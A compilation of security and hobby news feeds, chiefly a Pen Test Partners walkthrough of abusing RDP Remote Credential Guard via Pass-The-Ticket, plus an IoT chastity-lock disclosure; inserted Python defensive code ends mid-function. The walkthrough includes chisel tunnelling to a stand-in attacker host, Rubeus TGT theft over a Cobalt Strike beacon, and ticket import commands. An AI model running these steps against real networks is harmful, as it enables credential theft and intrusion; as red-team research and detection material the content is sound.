Null Byte « WonderHowTo
As we've seen with other tools and utilities, administrators typically use certain things to do their job more efficiently, and those things are often abused by attackers for exploitation. After all, hacking is just the process of getting a computer to do things in unexpected ways. Today, we will be covering various methods to perform banner grabbing to learn more about the target system. Banner grabbing is a technique used to gather information about running services on a computer system. Banners refer to the messages on the host that usually provide a greeting or version information. An...
One of the most exciting things as an ethical hacker, in my opinion, is catching a reverse shell. But often, these shells are limited, lacking the full power and functionality of a proper terminal. Certain things don't work in these environments, and they can be troublesome to work with. Luckily, with a few commands, we can upgrade to a fully interactive shell with all the bells and whistles. It can often be frustrating when working with reverse shells if all you have is a "dumb" shell. A dumb shell is a type of shell that doesn't have a proper terminal's full functionality. That means things...
We're living in the age of Big Data. As the primary force behind everything from targeted marketing campaigns and online search algorithms to self-driving cars and even space exploration, massive sets of complex data stand at the heart of today's most exciting and important innovations. The Complete Big Data eBook & Video Course Bundle will act as your one-stop resource for learning how to harness this field's most powerful and relied-upon tools and platforms, and it's on sale today for 95% off at just $29.99. Whether you're interested in becoming a full-fledged data engineer or want to gain...
The Hacker News
Microsoft, in collaboration with MITRE, IBM, NVIDIA, and Bosch, has released a new open framework that aims to help security analysts detect, respond to, and remediate adversarial attacks against machine learning (ML) systems. Called the Adversarial ML Threat Matrix, the initiative is an attempt to organize the different techniques employed by malicious adversaries in subverting ML systems. Just
Attention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today. Google released Chrome version 86.0.4240.111 today to patch several security high-severity issues, including a zero-day vulnerability that has been exploited in the wild by attackers to
Cybersecurity researchers on Tuesday disclosed details about an address bar spoofing vulnerability affecting multiple mobile browsers, such as Apple Safari and Opera Touch, leaving the door open for spear-phishing attacks and delivering malware. Other impacted browsers include UCWeb, Yandex Browser, Bolt Browser, and RITS Browser. The flaws were discovered by Pakistani
Hackaday
Here’s a neat little trick: take the jaggies out of scaled fonts on the fly! This technique is for use on graphic displays where you might want to scale your fonts up. Normally you’d just write a 2×2 block of pixels for every area where there would have been one pixel and boom, larger font. Problem is, that also multiplies each empty area and you end up with jagged edges in the transitions that really catch your eye.
[David Johnson-Davies] entered big-brain mode and did something much cleverer than the obvious solution of using multiple font files. Turns out if you analyze the smoothing problem you’ll realize that it’s only the angled areas that are to blame, horizontal and vertical scaling are nice and smooth. [David’s] fix looks for checker patterns in what’s being drawn, adding a single pixel in the blank spots to smooth out the edge incredibly well!
The technique has been packaged up in a simple function that [David] wrote to play nicely in the Arduino ecosystem. However, the routine is straightforward and would be quick to implement no matter the language or controller. Keep this one in your back pocket!
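As an added illustration (a Python reconstruction from the description above, not [David]'s Arduino routine), here is the naive 2× scaler beside one that looks for the checker pattern in each 2×2 window of the source glyph and fills one pixel on either side of the corner where the two scaled blocks meet. The glyph is a constructed 3×3 diagonal stroke, the worst case for jaggies; the routine works on any bitmap, not just fonts.

```python
# Added example: 2x bitmap scaling with the diagonal fix described above,
# reconstructed from the description (not [David]'s Arduino routine).
# Bitmaps are lists of equal-length strings, '#' = set pixel, '.' = clear.

def scale2x_plain(rows):
    """Naive 2x scaling: every source pixel becomes a 2x2 block."""
    out = []
    for row in rows:
        doubled = "".join(ch * 2 for ch in row)
        out += [doubled, doubled]
    return out


def scale2x_smooth(rows):
    """2x scaling plus smoothing: wherever a 2x2 window of the source is a
    checker pattern (one diagonal set, the other clear), the two scaled
    blocks meet only at a corner, so one extra pixel is set on each side of
    that corner. Horizontal and vertical runs never match and stay as-is."""
    out = [list(r) for r in scale2x_plain(rows)]
    for y in range(len(rows) - 1):
        for x in range(len(rows[y]) - 1):
            a, b = rows[y][x] == "#", rows[y][x + 1] == "#"
            c, d = rows[y + 1][x] == "#", rows[y + 1][x + 1] == "#"
            cy, cx = 2 * y + 1, 2 * x + 1   # output pixel at the window's centre corner
            if a and d and not (b or c):    # "\" diagonal
                out[cy][cx + 1] = "#"
                out[cy + 1][cx] = "#"
            elif b and c and not (a or d):  # "/" diagonal
                out[cy][cx] = "#"
                out[cy + 1][cx + 1] = "#"
    return ["".join(r) for r in out]


def count_pixels(rows):
    return sum(row.count("#") for row in rows)


# Constructed 3x3 glyph with a pure diagonal stroke, the worst case for jaggies.
SAMPLE_GLYPH = [
    "#..",
    ".#.",
    "..#",
]

if __name__ == "__main__":
    print("\n".join(scale2x_plain(SAMPLE_GLYPH)), end="\n\n")
    print("\n".join(scale2x_smooth(SAMPLE_GLYPH)))
```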
Now if all you have on hand is an HD44780 character LCD, that one’s arguably even more fun to hack around on just because you’re so limited on going beyond the hard-coded font set. We’ve seen amazing things like using the custom character slots to play Tetris.
The human body does plenty of cool tricks, but one of the easiest to take advantage of is persistence of vision (POV). Our eyes continue to see light for a fraction of a second after the light goes off, and we can leverage this into fun blinkenlight toys like POV staffs. Sure, you can buy POV staffs and other devices, but they’re pretty expensive and you won’t learn anything that way. Building something yourself is often the more expensive route, but that’s not the case with [shurik179]’s excellent open-source POV staff.
There’s a lot to like about this project, starting with the detailed instructions. It’s based on the ItsyBitsyM4 Express and Adafruit’s Dotstar LED strips. You could use the Bluetooth version, but it’s already quite easy to load images to the staff because it shows up as a USB mass storage device. We like that [shurik179] added an IMU and coded the staff so that the images look consistent no matter how fast the staff is spinning. In the future, [shurik179] might make a Bluetooth version that’s collapsible. That sounds like quite the feat, and we can’t wait to see it in action.
As cool as it is to wave a POV staff around, there’s no real practical application. What’s more practical than a clock?
In what can only be described as a work of art, [suedbunker] has created a clock under a glass dome. Sporting Nixie tubes, a DS3223, BCD encoders, and MPSA43 transistors driven by an MCP23008 I/O expander it is truly a sight to behold. [suedbunker] has previously created the Circus Clock, a similar clock that celebrated a diversity of ways of displaying the time.
The dome clock represents a continuation of that idea. Reading the clock requires looking at the horizontal and vertical numbers separately. The hours are on the horizontal and minutes are on the vertical. Monday to Sunday is represented in the neon bulbs on the back. The power supply at the bottom provides a wide range of voltages including 5 V, 12 V, 24 V, 45 V, 90 V, 150 V, and -270 V for all the various types of lights. For safety, an optocoupler is used on the -270 volts to drive the clear seven-segment display.
An Arduino Nano controls the whole clock by communicating with the DS3223 real-time clock module and the port expanders via I2C. The soldering and wiring work, in particular, is tidy and beautiful. We look forward to future clocks by [suedbunker] and his wife.
Pen Test Partners
- Microsoft’s Remote Credential Guard (RCG) for RDP protects creds if an RDP server is compromised.
- It leaves little scope for password or NTLM credential dumping when a user connects to the server.
- It does however introduce workstation attack vectors.
- Abusing a user’s Kerberos token allows Pass-The-Ticket (PTT) attacks and authentication to RDP servers without credentials.
- PTT attacks are nothing new, but there is no offensive RDP tool that supports RCG (that I know of).
- We have to resort to using the built in Terminal Services Client and a few tricks to allow Kerberos to fully function from a remote non-domain joined machine.
Historically, attacks on RDP using Pass-The-Hash and Pass-The-Ticket techniques have not been possible. Typically, Windows performed an interactive logon when connecting to RDP, therefore valid credentials were always required to perform such logins.
Then came Network Level Authentication (NLA), introduced in RDP 6.0 around the time Windows Vista was released. The purpose of NLA is to ensure an authenticated session occurs before remote desktop resources are allocated and the Windows logon screen is shown. Why waste server resources and expose potential attack vectors prior to authentication? But even with the introduction of NLA, PTH and PTT techniques were still not possible.
Whilst NLA can perform both NTLM and Kerberos authentication, this is only the first phase, satisfying the NLA portion of the protocol. The CredSSP provider used by NLA still required a form of valid credentials within a structure called TSCredentials. Prior to Windows 10, version 1607 and Windows Server 2016, this structure would only permit password or smartcard based credentials.
Remote Credential Guard
Then came along Remote Credential Guard (RCG) and Restricted Admin mode. Both allow the second phase to use NTLM/Kerberos for authentication by introducing another type of credentials called TSRemoteGuardCreds. Well, that’s not entirely correct: Restricted Admin mode will happily accept an empty TSPasswordCreds structure, which is duly ignored by the server when connecting using Restricted Admin mode. I won’t go into too much detail on this since @SteveSyfuhs does a much better job in his How Authentication works when you use Remote Desktop article.
CyberArk also wrote an article called “No more Pass-the-Hash” – Exploring the limitations of Remote Credential Guard. In essence, if a server that is remotely administered using RCG is compromised, no credentials are ever exchanged with the remote desktop host, significantly reducing the chance of credential compromise. The TGT imported into the cache on the server is also of no use outside the RDP host, since it has been delegated to the client machine, as CyberArk explain in their article. What CyberArk don’t mention, though, is a primary TGT.
If you can obtain a primary TGT along with its session key, for example one that is produced on a domain joined interactive logon session, then you can use this to authenticate to remote RDP servers with RCG enabled. Better still, all this can be done without requiring elevated permissions.
Microsoft Diagram of RCG features.
RCG is quite complex. Once you have authenticated to the RDP server, a channel is created between the server and the client that allows Kerberos service tickets to be requested from the client on behalf of the RDP server. After the RDP connection is established, any additional Kerberos network services requested within the session go through this RCG channel. I have yet to find an RDP client commonly used for offensive purposes that supports RCG. FreeRDP allows the use of /pth, but this enforces Restricted Admin mode, preventing any further access beyond the RDP host itself.
Killer Combo: Rubeus, Proxifier and Terminal Services Client
So how can we utilise PTT attacks using the only tool I know of that supports RCG, the Windows Terminal Services Client?
There are a few things that Terminal Services Client needs to function in RCG mode. In addition to the obvious RDP port access, the client also requires functional AD DNS and access to the Kerberos KDC. This is generally a lot easier when the attacking machine is connected (but not joined) to the same network as AD. But when performing a red team, we seldom have access to such a node without raising alarms. Generally, we must hop through a proxy or two to get at our targets from our own box whilst staying under the radar.
In the scenario below I will assume that a Cobalt Strike or similar implant is active on a compromised domain joined workstation.
The first stage is to set up Terminal Services Client to pivot through a SOCKS proxy into the victim’s Active Directory domain. You need a capable SOCKS proxy if you intend to bounce around to different RDP targets within the AD domain. I tend to use chisel for this purpose.
Typically, the chisel server is set up on a public domain somewhere, accessible from the victim’s Active Directory network. Starting the server in simple HTTP mode on port 8080 is as easy as:
chisel server -reverse -socks5
The reverse and socks5 options allow the client to specify reverse proxy and SOCKS5 rules to permit incoming SOCKS into the victim Active Directory network.
Once the chisel server is up and running, we need to connect to it from the compromised host to open a route into the AD network. This would usually be done over the C2 channel:
chisel client http://chisel.evilhost.com:8080 R:3128:socks R:88:dc1.hacklab.local:88/udp R:88:dc1.hacklab.local:88
The client requests three reverse port forwards: the first is a SOCKS5-capable port listening on 3128, and the other two map port 88 TCP and UDP to the KDC (DC) host within the Active Directory network. Unfortunately, Proxifier didn’t seem to use the SOCKS5 port when accessing the KDC, hence the need for the direct mappings for port 88.
For those who have not used Proxifier before, it is essentially proxychains for Windows. The great thing with Proxifier is that there is no need to prefix the app that requires proxying. You build the rules inside the Proxifier GUI and it automatically applies the redirection and forwards to your SOCKS proxy if the rules match. I’d recommend you do all this from a VM: installing Proxifier seems to break WSL2 due to its use of Winsock LSPs.
First things first, set up the Name Resolution settings as below:
Proxifier will intercept all DNS queries on the host and, if any match the domain hacklab.local, resolution will be performed over the configured SOCKS proxies.
Next, we set up the proxy servers required to pivot into the victim AD network. You will notice the use of localhost here, as this is where I set up chisel within the lab scenario, but this would normally be the address of your chisel server along with the port specified for reverse SOCKS into the AD network.
And finally, we create a Proxification rule to ensure that the mstsc.exe program uses the SOCKS proxy for communication with the target host.
As mentioned earlier, I also added lsass.exe to this rule in an attempt to get Kerberos pushed down the SOCKS proxy automatically, but for whatever reason this didn’t work. Even forcing TCP on the KDC realm (see below) did not help.
With Proxifier set up this way, all DNS queries for hacklab.local will be resolved using the SOCKS proxy, and any connections to hacklab.local from mstsc.exe will also go via the SOCKS proxy. This in essence allows AD DNS to function and gives access to the RDP host we would like to pivot to, in one go.
Manually Adding the Kerberos Realm
Many off-domain techniques that use Kerberos tickets to authenticate to a remote service only really need the TGS in question, for example for CIFS or LDAP, which generally forgoes any need to communicate with the KDC. RCG is a little different: the machine seems to need access to the TGT and not just the TERMSRV TGS.
I imagine the reason for this is the channel I mentioned earlier. Not only does the client request the TERMSRV TGS before connecting, it will also request any other service tickets on behalf of the target RDP host when asked to. This can be a problem when your machine is not joined to AD: LSA will notice that the TGT is present within the user’s Kerberos cache but will struggle to find a valid KDC from which to request further service tickets.
On a domain-joined machine, LSA looks up the Kerberos SRV record based on the domain name the machine is joined to. Since we are not joined to the domain, the client will fail to resolve the KDC and fall back to NTLM, triggering a credential dialog when connecting to the RDP target. We can work around this by manually registering a Kerberos realm within Windows on the attacking host machine.
ksetup /addkdc HACKLAB.LOCAL chisel.evilhost.com
ksetup /setrealmflags HACKLAB.LOCAL tcpsupported
Once you have done this, a reboot is required for LSA to pick up the fixed realms now configured within the registry. The idea is to inform LSA that it can find the KDC for HACKLAB.LOCAL via the chisel server. Since we have mapped both TCP and UDP port 88 into the AD network, this permits LSA to request further tickets through the chisel proxy, via the compromised host, into the Active Directory network.
Obtaining the TGT
Unlike NTLM hashes, we don’t need elevated privileges to obtain a TGT that can be used for PTT. Typically, TGTs are also locked away within LSASS just like NTLM hashes. Partial TGT info can be requested from user mode, but key information is missing that is only stored inside LSASS.
Using a trick that @gentilkiwi and co found, you can fill in these blanks with delegation tickets. @Harmj0y does a great job of explaining how this works in his Rubeus – Now With More Kekeo blog post, written whilst he was adding the tgtdeleg feature to Rubeus. We can request the current user’s TGT like this over a CS beacon implant on the compromised host:
beacon> execute-assembly C:\tools\Rubeus.exe tgtdeleg /nowrap
[*] Tasked beacon to run .NET program: Rubeus.exe tgtdeleg /nowrap
[+] host called home, sent: 356939 bytes
[+] received output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc1.hacklab.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: HXscMHx0OckqQHg2ijyLdd8gbSr0H3jik/HbZ/LfpW8=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFjjCCBYqgAwIBBaEDAgEWooIEZzCCBGNhggRfMIIEW6ADAgEFoQ8bDUhBQ0tMQUIuTE9DQUyiIjAgoAMCAQ……….FDS0xBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNSEFDS0xBQi5MT0NBTA==
Importing TGT Into the Attacking Windows Host
Once you have dumped the user’s TGT over your C2 channel, you can import it into your attacking Windows machine. Again, Rubeus can be used for this. Running the following from an elevated command prompt will import the TGT stolen in the previous step.
Rubeus.exe ptt /ticket:doIFjjCCBYqgAw………i5MT0NBTA==

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Import Ticket
[+] Ticket successfully imported!

Issuing a klist command should confirm the imported TGT in the current session:

klist

Current LogonId is 0:0x15cf57

Cached Tickets: (1)

#0>     Client: Administrator @ HACKLAB.LOCAL
        Server: krbtgt/HACKLAB.LOCAL @ HACKLAB.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 10/19/2020 15:20:43 (local)
        End Time:   10/20/2020 1:20:07 (local)
        Renew Time: 10/26/2020 15:20:07 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
One thing to note here: if you have other Kerberos tickets not belonging to the victim domain, then you are likely domain joined yourself, in which case you should start a clean session without any Kerberos tickets available. This can be achieved using Rubeus createnetonly or the runas /netonly command prior to importing the ticket.
Pivoting to the Host
The last step of the attack is simply to invoke mstsc.exe from the session we imported the TGT into in the previous step, with the correct arguments to utilise RCG. The client will be forced through Proxifier for AD DNS lookups and RDP. LSA will use the chisel server’s port 88 directly for any additional Kerberos tickets that need to be obtained for HACKLAB.LOCAL.
mstsc /remoteGuard /v:dc1.hacklab.local
If everything worked correctly you should be greeted with the desktop of your new compromised host.
You should also be able to see, on the attacking host machine, the additional TERMSRV TGS that mstsc.exe requested during connection.
klist

Current LogonId is 0:0x15cf57

Cached Tickets: (2)

#0>     Client: Administrator @ HACKLAB.LOCAL
        Server: krbtgt/HACKLAB.LOCAL @ HACKLAB.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 10/19/2020 22:04:22 (local)
        End Time:   10/20/2020 8:04:22 (local)
        Renew Time: 10/26/2020 22:04:22 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: Administrator @ HACKLAB.LOCAL
        Server: TERMSRV/dc1.hacklab.local @ HACKLAB.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 10/19/2020 22:08:04 (local)
        End Time:   10/20/2020 8:04:22 (local)
        Renew Time: 10/26/2020 22:04:22 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: dc1.hacklab.local
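From the defender's side, the ticket cache above carries a tell worth checking for. As an added example (not part of the Pen Test Partners post), the following parses klist output, decodes the Ticket Flags value using the RFC 4120 bit layout, and flags a PRIMARY TGT that is marked forwarded but not initial: a TGT the workstation obtains itself at logon comes from the AS exchange and carries initial, whereas the delegation TGT shown above was issued by a TGS exchange and then imported. The sample klist text is constructed from the output above and trimmed to the fields the parser uses; treat a match as a triage signal to confirm against the logon source, not as proof on its own.

```python
import re
from dataclasses import dataclass

# Kerberos TicketFlags as klist prints them: RFC 4120 bit numbering with bit 0
# as the most significant bit of the 32-bit value (name_canonicalize is the
# Windows-specific bit). 0x60a10000 from the output above decodes to
# forwardable forwarded renewable pre_authent name_canonicalize.
TICKET_FLAG_BITS = {
    "forwardable": 0x40000000, "forwarded": 0x20000000,
    "proxiable": 0x10000000, "proxy": 0x08000000,
    "may_postdate": 0x04000000, "postdated": 0x02000000,
    "invalid": 0x01000000, "renewable": 0x00800000,
    "initial": 0x00400000, "pre_authent": 0x00200000,
    "hw_authent": 0x00100000, "transited_policy_checked": 0x00080000,
    "ok_as_delegate": 0x00040000, "name_canonicalize": 0x00010000,
}
CACHE_FLAG_PRIMARY = 0x1  # klist shows this as "Cache Flags: 0x1 -> PRIMARY"


@dataclass
class CachedTicket:
    client: str
    server: str
    ticket_flags: int
    cache_flags: int
    kdc_called: str


def decode_ticket_flags(value):
    """Names of the flag bits set in a klist 'Ticket Flags' value, in klist order."""
    return [name for name, bit in TICKET_FLAG_BITS.items() if value & bit]


def parse_klist(text):
    """Parses the '#N>' entries of klist output into CachedTicket objects."""
    tickets = []
    for entry in re.split(r"(?m)^#\d+>", text)[1:]:
        client = re.search(r"Client:\s*(\S+ @ \S+)", entry).group(1)
        server = re.search(r"Server:\s*(\S+ @ \S+)", entry).group(1)
        ticket_flags = int(re.search(r"Ticket Flags\s+0x([0-9a-fA-F]+)", entry).group(1), 16)
        cache_flags = int(re.search(r"Cache Flags:\s*(?:0x)?([0-9a-fA-F]+)", entry).group(1), 16)
        kdc_called = re.search(r"Kdc Called:[ \t]*(\S*)", entry).group(1)
        tickets.append(CachedTicket(client, server, ticket_flags, cache_flags, kdc_called))
    return tickets


def is_imported_delegation_tgt(ticket):
    """Triage heuristic. A TGT the machine obtained itself at logon comes from
    the AS exchange and carries 'initial'. A PRIMARY TGT that is 'forwarded'
    and lacks 'initial' came out of a TGS exchange with forwarding and was then
    placed in the cache, which is what tgtdeleg followed by ptt leaves behind.
    Confirm against the logon source before treating it as an incident."""
    flags = decode_ticket_flags(ticket.ticket_flags)
    return (ticket.server.startswith("krbtgt/")
            and bool(ticket.cache_flags & CACHE_FLAG_PRIMARY)
            and "forwarded" in flags and "initial" not in flags)


def suspicious_tgts(klist_text):
    """Client principals whose primary TGT matches the heuristic."""
    return [t.client for t in parse_klist(klist_text) if is_imported_delegation_tgt(t)]


# Constructed sample: the two entries from the klist output above, trimmed to
# the fields the parser uses.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ HACKLAB.LOCAL
        Server: krbtgt/HACKLAB.LOCAL @ HACKLAB.LOCAL
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: Administrator @ HACKLAB.LOCAL
        Server: TERMSRV/dc1.hacklab.local @ HACKLAB.LOCAL
        Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
        Cache Flags: 0
        Kdc Called: dc1.hacklab.local
"""

# Constructed contrast: an ordinary interactive-logon TGT (0x40e10000 =
# forwardable renewable initial pre_authent name_canonicalize).
LOGON_KLIST = """\
#0>     Client: alice @ EXAMPLE.LOCAL
        Server: krbtgt/EXAMPLE.LOCAL @ EXAMPLE.LOCAL
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: dc1.example.local
"""

if __name__ == "__main__":
    print(suspicious_tgts(SAMPLE_KLIST))  # ['Administrator @ HACKLAB.LOCAL']
    print(suspicious_tgts(LOGON_KLIST))   # []
```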
Remote Credential Guard is an excellent feature for protecting credentials when connecting to a compromised server. Since no credentials are exchanged and the TGT is not exportable for abuse, it protects the high privilege accounts connecting to servers protected by RCG.
Of course, if you flip the compromise on its head and end up on a workstation, you may find yourself vulnerable to this kind of attack. If a user has rights to connect to RDP hosts and RCG is enabled within the AD network, then you no longer need to compromise any account passwords to connect to those RDP hosts; you simply swipe the TGT and Pass-The-Ticket.
The post Abusing RDP's Remote Credential Guard with Rubeus PTT first appeared on Pen Test Partners.
October is Cyber Security Month, when organisations like the CISA, the ECSM, and many more promote initiatives to help raise security awareness. Around the world companies are dedicating time to improve staff security awareness, and it’s a really busy time for us.
You may be thinking you’d like to do something but are stuck for ideas to run. Below I have listed a few ideas that I have seen work really well at engaging staff and helping change culture.
Posters are an old stalwart. They can be successful but need to be kept fresh and eye-catching. The message needs to be simple, the visuals strong and amusing. Key messages could be:
- Use a password manager
- What’s on that USB you plugged in?
- Oversharing on Social Media again?
- Turn on Two-Factor Authentication
- Lock your workstation
- Think before you click
You could also include some key policy messages here, but don’t overdo it. Remember, it needs to be interesting. Telling your staff on a poster why you use AES-256 encryption is dull!
Engage with your marketing teams or external designers to help you out too. Not only can they make the designs look good, but they can keep the wording appropriate to the whole company. Put posters everywhere: in lifts, on doors, in toilets, in staff rooms, anywhere staff will see them. You could even use digital signage or screens for these messages.
Security tip of the week/month
This is a great way of keeping the message current. Each week or month, send out a different tip. There are many ways to do this: email, Teams/Slack, posters, banners on intranet pages, whatever works best for your organisation.
The tips could be as simple as how to use a password manager or how two-factor authentication works. I would talk about personal and home security issues as well as work ones. This will help endear your staff to your messages: if you share home security advice, they are more likely to act on it, as they can see the value to them personally.
Security branded ‘stuff’
Another way to help keep security messaging in people’s thoughts is to give away nice branded items.
Some things I have found work well: branded paper cups to use in your onsite café (you can get thousands for less than £50); USB blockers, a great way to tie in to USB security; fidget cubes, the modern-day ‘stress ball’; socks. We give our own socks away; they are a fun way of getting interaction. I’d avoid tacky mouse mats, pens and dull stuff you wouldn’t even bother picking up at a conference or trade event.
There are so many innovative gifts these days, from facemasks to water bottles, to notepads and card blockers. Almost anything can be branded with your key messages.
Security stall with games
Set up a virtual stand, be that in a channel on Teams or Slack, and allow people to ask you any questions. You could also tie in to your branded items by rewarding those who ask questions or perhaps those who send you an example of a phishing email.
Anyone who sends you a phishing email gets something; you’ll have loads in a few days and staff will be on the lookout for more. You could even do something like a loyalty scheme with gifts: after the 6th phishing email they win a free coffee, for example.
Security champion program
A security champion is someone who works in key departments and is your security eyes and ears. It can be as simple as them just helping field questions or as high a level as having local password reset ability. It is a great way of empowering departments to provide localised help and take the weight off you. These people could be rewarded with dinners or tech.
You could take this further and set up full virtual security champion teams. When lockdown restrictions are eased and lifted you could provide an away day, complete with lunch to brainstorm ideas for the next Cyber Security Month. I’ve spoken as an external speaker at a number of days like these, giving a different perspective and providing some external view of the risk.
You could send regular security stats out each week or month. This is not an opportunity for you to blow your own trumpet about how amazing the security tools you put in are, it’s to focus on the things that end users alerted you to. “We had 27 phishing emails alerted to us this month, everyone got a pair of socks, two people got their coffee free for a week” etc.
You could also talk about any breaches you may have had. Do not name names though. Focus on how you found the breaches and how the response was carried out. This is a great way to provide insight in to what you do and give relevance to your budget spends.
Like all good things, getting senior staff buy-in is key to any successful security awareness program. Get your CEO to email the whole company. This may take a little persuasion and possibly a little upward management and of course time so plan early.
It is so important to educate and then test your staff; this can give you some basic metrics. However, do not see these metrics as a way of demonstrating the value of your program.
Phishing stats are a fickle thing: one month you could have really positive results and the next really poor. Does that mean your program has failed? Not always. Sometimes your phishes hit their mark; it’s just an opportunity to keep that message going and keep training.
It is excellent practice to vary your phishing style and targets each month. This can help you identify trends and individuals who may need more help and training.
Securing home computers/devices or family
Providing help and guidance on how to secure home devices and computers is a great way to engage your staff. Your security champions can help here as can your security stall. You can also provide downloadable tips and tricks people can take home to secure their own home network.
You need to be mindful that many staff won’t be technical so keep it simple. Showing how to set up parental controls or how to securely configure social media for example can be useful as there are many options.
Security focused lunch-and-learn talks
At PTP we have a lunch-and-learn every Friday: PTP TeaSides. The content is diverse: previews of conference talks, blacksmithing, origami, home-brew beer and mead, first aid for children. You could set up your own lunch-and-learn sessions focused on security, perhaps once a month, talking about how to do certain things.
Your home security guidance could be one of the topics; you could also show how to use the email security tools you have in place, or do a talk on phishing. There is so much choice, and this will really help engagement. If you find people struggle to attend, a common tactic is to provide lunch. With home working that won’t work right now, but when staff are in the office, providing a few sandwiches while you talk about security will surely get an audience.
Overall I have found the best engagement messages are the ones that focus less on what you can and cannot do at work, but more on how staff can help fix things themselves, this helps change culture.
A successful campaign is about moving from a security awareness campaign to a security culture change. When your staff have a culture of security awareness, they are much more switched on to the risks you are trying to prevent, much more likely to spot something that is not right, and will champion security through the business.
This takes time and effort: the things you do in Cyber Security Month you need to be doing all year long. Much like patching your servers, you don’t do that once a year, you do it constantly. A security culture is the same; you have to keep the message going throughout the year.
Good luck and if we can help you kick your program off reach out and we will happily help.
- Smart Bluetooth male chastity lock, designed for the user to give remote control to a trusted third party using a mobile app/API
- Multiple API flaws meant anyone could remotely lock all devices and prevent users from releasing themselves
- Removal then requires an angle grinder or similar, used in close proximity to delicate and sensitive areas
- Precise user location data also leaked by the API, including personal information and private chats
- Vendor initially responsive, then missed three remediation deadlines they set themselves over a 6 month period
- Then finally refused to interact any further, even though the majority of issues were resolved in the migration to the v2 API, yet API v1 was inexcusably left available
This post is published in coordination with Internet of Dongs.
Smart adult toys and us
We haven’t written about smart adult toys in a long time, but the Qiui Cellmate chastity cage was simply too interesting to pass by. We were tipped off about the adult chastity device, designed to lock up the wearer’s appendage.
There are other male chastity devices available but this is a Bluetooth (BLE) enabled lock and clamp type mechanism with a companion mobile app. The idea is that the wearer can give control of the lock to someone else.
We are not in the business of kink shaming. People should be able to use these devices safely and securely without the risk of sensitive personal data being leaked.
The security of the teledildonics field is interesting in its own right. It’s worth noting that sales of smart adult toys have risen significantly during the recent lockdown.
What is the risk to users?
We discovered that remote attackers could prevent the Bluetooth lock from being opened, permanently locking the user in the device. There is no physical unlock. The tube is locked onto a ring worn around the base of the genitals, making things inaccessible. An angle grinder or other suitable heavy tool would be required to cut the wearer free.
Location, plaintext passwords and other personal data were also leaked by the API, without any need for authentication.
We had particular problems during the disclosure process, as we would usually ask the vendor to take down a leaky API whilst remediation was being implemented. However, anyone currently using the device when the API was taken offline would also be permanently locked in!
As you will see in the disclosure timeline at the bottom of this post, some issues were remediated but others were not, and the vendor simply stopped replying to us, journalists, and retailers. Given the trivial nature of finding some of these issues, and that the company is working on another device that poses even greater potential physical harm (an “internal” chastity device), we have felt compelled to publish these findings at this point.
We have redacted significant details here.
We found a serious privacy vulnerability very quickly with the mobile app: all API endpoints were unauthenticated, requiring only a long-ish “memberCode” to make requests. The memberCode itself is somewhat deterministic and is based on the date a user signed up for the service; however, we found an even easier way in, using a shorter “friend code”.
A request with this six digit “friend” code returned a huge amount of information about that user, including very sensitive information such as their name, phone number, birthday, the exact co-ordinates where the app was opened, their longer “memberCode” value, and the user’s plaintext password (not that we need it).
It wouldn’t take an attacker more than a couple of days to exfiltrate the entire user database and use it for blackmail or phishing.
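Bulk exfiltration of this kind leaves a recognisable trace on the server side: one client fetching many distinct friend codes in a short time. The following is an added example, not code from the original post or from Qiui, that flags that pattern in API access logs. The log line format, the `/friend` path, the `friendCode` parameter name and the thresholds are assumptions for illustration; the sample log lines are constructed.

```python
"""Added example, not code from the original post: detecting bulk enumeration
of user records in API access logs.

The post describes an endpoint that returned a whole user profile for any
six-digit "friend code" without authentication. On the server side that
activity is a single client fetching many distinct codes in a short time,
which a log monitor can flag. The log line format, the /friend path and the
thresholds are assumptions for illustration, not Qiui's real API."""

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log shape: "<client-ip> [<ISO-8601 timestamp>] <METHOD> <path> <status>"
LINE_RE = re.compile(
    r"^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)
FRIEND_CODE_RE = re.compile(r"[?&]friendCode=(\d{6})(?:&|$)")


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
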